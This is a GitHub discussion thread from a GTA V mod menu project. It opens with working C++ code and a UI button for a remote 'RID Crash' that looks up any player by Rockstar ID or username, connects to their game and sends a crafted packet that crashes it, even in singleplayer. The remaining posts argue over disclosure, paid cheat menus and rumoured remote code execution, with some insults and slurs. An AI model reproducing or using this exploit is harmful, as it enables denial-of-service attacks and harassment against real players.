### DISCUSSION TITLE
RID Crash

### DISCUSSION THREAD

**Discussion by maybegreat48** [YimMenu/YimMenu#808] [Research]
```c++
	inline void crash_by_rockstar_id(uint64_t rid)
	{
		rage::rlGamerHandle player_handle(rid);
		rage::rlScHandle socialclub_handle(rid);

		rage::snConnectToPeerTaskData connect_to_peer_data{};
		rage::snConnectToPeerTaskResult connect_to_peer_result{};
		rage::rlTaskStatus connect_to_peer_status{};

		rage::rlQueryPresenceAttributesContext query_presence_attributes_context{};
		rage::rlTaskStatus query_presence_attributes_status{};
		rage::rlGamerInfoBase peer_address{};

		query_presence_attributes_context.m_presence_attibute_type = 3; // string
		strcpy(query_presence_attributes_context.m_presence_attribute_key, "peeraddr");

		if (!g_pointers->m_start_get_presence_attributes(0, &socialclub_handle, &query_presence_attributes_context, 1, &query_presence_attributes_status))
		{
			g_notification_service->push_error("RID Crash", "Cannot start the query presence attributes rline task");
			return;
		}

		while (query_presence_attributes_status.status == 1)
			script::get_current()->yield();

		if (query_presence_attributes_status.status != 3)
		{
			g_notification_service->push_error("RID Crash", "Querying presence attributes failed");
			return;
		}

		connect_to_peer_data.m_unk = 0;
		connect_to_peer_data.m_reason = 5;
		connect_to_peer_data.m_session_token = 0;

		g_pointers->m_decode_peer_info(&peer_address, query_presence_attributes_context.m_presence_attribute_value, nullptr);

		if (!g_pointers->m_connect_to_peer(gta_util::get_network()->m_game_session.m_net_connection_mgr, &peer_address, &connect_to_peer_data, &connect_to_peer_result, &connect_to_peer_status))
		{
			g_notification_service->push_error("RID Crash", "Failed to start a connection with player");
			return;
		}

		g_notification_service->push("RID Crash", "Connecting to player...");

		while (connect_to_peer_status.status == 1)
			script::get_current()->yield();

		if (connect_to_peer_status.status != 3)
		{
			g_notification_service->push_error("RID Crash", "Failed to connect to player");
			return;
		}

		packet msg;
		msg.write_message(rage::eNetMessage::MsgTransitionLaunch);
		msg.send(connect_to_peer_result.m_peer_id, 7);
		g_notification_service->push("RID Crash", "Sent transition launch crash");
	}
```

```c++
components::button("Crash by RID", []
		{
			session::crash_by_rockstar_id(rid);
		});

inline void crash_by_username(std::string username)
	{
		g_thread_pool->push([username]
		{
			uint64_t rid;
			if (g_api_service->get_rid_from_username(username, rid))
			{
				g_fiber_pool->queue_job([rid]
				{
					crash_by_rockstar_id(rid);
				});
				return;
			}
			g_notification_service->push_error("RID Crash", "Target player is offline?");
		});
	}
```
The crash works even if the target is in singleplayer

**Comment by Vali0004** [comment]
God fucking dammit. Did this HAVE to go public? It took rockstar 11 months to patch chat spoofing once it went public, and you think that won’t happen again? It took them YEARS to add one conditional statement for weather crashes

**Reply by Yimura** [reply]
I have no problems with it being public, R* just needs to know where to put their resources better.

**Reply by SkiddyToast** [reply]
Since this one is much more severe, it will at most take months, but it's just one if statement they need to add to patch it.

**Reply by Aure7138** [reply]
I think pipebomb is being abused even without publishing it

**Reply by SkiddyToast** [reply]
This is the "Pipebomb" crash.

**Reply by maybegreat48** [reply]
This is obviously different from the other exploits you've mentioned and would be patched very soon. I generally hate releasing or even finding crashes, but I've decided to make an exception for this one seeing how the P2Cs blatantly decided to sell it instead of keeping it private

I don't like it either, but Stand made it public, not me. I'm just making it accessible for everyone

**Reply by Vali0004** [reply]
> This is obviously different from the other exploits you've mentioned and would be patched very soon. I generally hate releasing or even finding crashes, but I've decided to make an exception for this one seeing how the P2Cs blatantly decided to sell it instead of keeping it private
> 
> I don't like it either, but Stand made it public, not me. I'm just making it accessible for everyone

Correction, X-Force made it public. That caused Stand to make it public. Very big difference

**Reply by maybegreat48** [reply]
X-Force is a pasted menu and therefore someone must have sold it to them (Someone I know thinks it's Cherax). Doesn't matter much though, they made the kick public, but not the crash

**Reply by Sainan** [reply]
Ha, maybegreat48 complaining about things being made public. What a show.

**Reply by xiaoxiao921** [reply]
Let's that sink that some retard cry about crashes going public when the biggest problem is actually r* that is greedy and retarded enough to think that a P2P network was going to be fine for PC lmao

**Reply by maybegreat48** [reply]
I like sharing knowledge and keeping things open, but a remote DoS exploit shouldn't be released at all in my opinion. All the things I've made "public" are harmless and/or have existed in at least one P2C in some capacity. 

Anyway, this discussion is solely about the crash and is not a place to argue whether it should have been made public or not

**Reply by Sainan** [reply]
We kept MsgLostConnectionToHost private for months. It was in no other P2C since other P2C devs had the understanding that it would be no good to release it to the public. You released it anyway. I don't particularly blame you for it, I'm sure you were thinking more about protecting from it then about using it, but you still released a "new" kick method to the public. And us then publishing that kick method resulted in us being called skids, so when we discovered the RID crash, why would I keep it private now just to be called a skid later? 🙃

**Reply by xiaoxiao921** [reply]
If it's already In a p2c it's already public, you really are stupid lmao. Also imagine caring about getting called a skid. You got some fragile ego my man

**Reply by Sainan** [reply]
I think you failed to understand, MsgLostConnectionToHost wasn't in any P2C prior to maybegreat48 publishing it, invaliding his own assessment of how he chooses to publish things. Also, it's less about ego, and more about reputation. If we keep features private and only release stuff after someone else added it, people would think of us as going stale, unoriginal, etc.

**Reply by xiaoxiao921** [reply]
MsgLostConnectionToHost is nothing special though? It's like saying breakup kick is too powerful let's not use it in our p2c. How stupid a p2c maintener can be I swear 🤣

**Reply by Sainan** [reply]
Exactly, it is nothing special, so the only value was in it being private. A concept that maybegreat48 seemingly doesn't understand. And seeming you don't either.

**Reply by ZeddMOCO** [reply]
Hmmm.
I am very interested.

**Reply by maybegreat48** [reply]
True, I didn't realize it was private until a few days after I've released it. My menu logs netMsgs and I found a few `MsgLostConnectionToHost `s in my logs and thought something added it. I agree with the reputation part too, but I think it's unlikely that someone would have made it public in the lifetime of GTA Online

You should use the Matrix server instead of this discussion as it's getting off topic (yes, the people that harassed you have been banned)

**Reply by Sainan** [reply]
Well, not longer after remote kicks started to become a thing in public menus, I started pondering remote crashes, and I kid you not, I found that nullptr dereference in like 5 minutes of looking. Maybe that was luck on my part for looking where I did, but I don't think it would've stayed undiscovered for long even if I kept it to myself. Also Stand already blocked it anyway, so I found it to be rather weak.

**Reply by ZeddMOCO** [reply]
Sorry to interrupt, but...
It's not a good idea to disclose the source, though.
I too had a private crash leaked.
Sorry if I got it wrong.

**Reply by PatchByte** [reply]
gta5 modding scene is a  big shit show

**Reply by pelecanidae** [reply]
My 2c -- crashes are a dime a dozen in this game. Mutate a few bits in each netMsg and you'll find a stupid number of OOB reads, even writes, in the handlers. Now, I'll be impressed when the first P2C is able to pop a `calc.exe` for the whole lobby 👺 `rockstargames-private` doesn't pay nearly enough for the kind of reputational damage you could do with that.

The mindblowing thing here is the whole remote connection setup; why the hell does the game let anyone connect to you like that when in single player?! It definitely should be public to keep the fire lit under R*'s ass. Nice reversing

**Reply by ZeddMOCO** [reply]
Ya

**Reply by ghost** [reply]
> Well, not longer after remote kicks started to become a thing in public menus, I started pondering remote crashes, and I kid you not, I found that nullptr dereference in like 5 minutes of looking. Maybe that was luck on my part for looking where I did, but I don't think it would've stayed undiscovered for long even if I kept it to myself. Also Stand already blocked it anyway, so I found it to be rather weak.

"Luck on my part"

**Comment by ghost** [comment]
Exceedingly based release.

Either rockstar fixes this one or all the private shit will start flowing like rivers out of the p2c devs' shelves.

I doubt they still care enough about the game to do anything about it.

**Comment by ghost** [comment]
Any game that makes it past 10 years of multiplayer uptime usually has arbitrary remote code execution. I've talked to a few people who have claimed to have this in the past. Just be happy THATS not public.

**Comment by Sainan** [comment]
@maybegreat48 What did you think would happen when you gave the rebound dev remote global writing? Now there's remote account bricking in P2Cs. Maybe not so great. 🙂

**Reply by PatchByte** [reply]
A mad Sainan, is a good Sainan

**Reply by Sainan** [reply]
Not mad, just disappointed... again.

**Reply by Yimura** [reply]
I doubt it leaked from there, the RCE was already publicly implemented for PS3.
You basically had to just port that to PC.

in regards to all the claims going around harvey bad sporting people, he’s just using that as free PR for his menu.

**Reply by ghost** [reply]
> Not mad, just disappointed... again.

I live to see you mald.

<3

**Reply by Sainan** [reply]
Glad to be so important to your life.
